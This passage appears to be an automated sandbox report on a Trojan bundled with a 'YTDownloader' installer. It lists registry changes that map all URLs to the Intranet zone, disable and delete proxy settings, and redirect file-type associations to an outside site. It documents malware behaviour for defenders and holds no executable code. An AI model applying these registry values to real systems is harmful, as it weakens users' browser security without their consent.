[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPer1_0Server" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\YTDownloader\Success]
"InstallStr" = "ok"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\SearchModulePlus\Success]
"Install" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 79 63 70 64 7D 34 93 09 4D 44 84 86 AB 2A D5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKLM\SOFTWARE\SearchModulePlus\Success]
"InstallStr" = "ok"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process DC%original file name%.exe:1276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 2E EA 7C FB 40 77 2C 5C 27 FA 73 AC 5F E2 9F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsB.tmp:2636 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

The process sma.exe:4012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 73 89 51 F0 2A 5E D5 79 33 3F 40 A1 01 CF A4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:4024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 41 21 2B 45 8B 05 53 37 4B 4C FD 66 31 32 8F"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:2100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 80 B0 1C A9 5E 80 35 84 0F 4B A7 D1 EA 2F DA"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 08 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:4028 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 4C 3E 64 B3 4C 0F 4C 99 DE 22 17 5E D7 39 67"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 07 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:3160 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 84 90 D5 6F 79 95 57 B1 32 E7 E5 FB 2D AA 64"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process setup.exe:2860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"ExeLocation" = "%Program Files%\YTDownloader\Converter.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\AniGIFPpg.AniGIFPpg]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "IAniGIF"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCR\AniGIFCtrl.AniGIF\CurVer]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"intl" = "http://www.fileextensionpro.com/redir.aspx?s=&LangID=x&Ext=%s"

[HKLM\SOFTWARE\YTDownloader]
"ExeLocation" = "%Program Files%\YTDownloader\YTDownloader.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"UninstallString" = "%Program Files%\YTDownloader\YTDUninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"Application" = "http://www.fileextensionpro.com/redir.aspx?s=&LangID=x&Ext=%s"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}]
"(Default)" = "Animation GIF Control"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"FFUseConverter" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
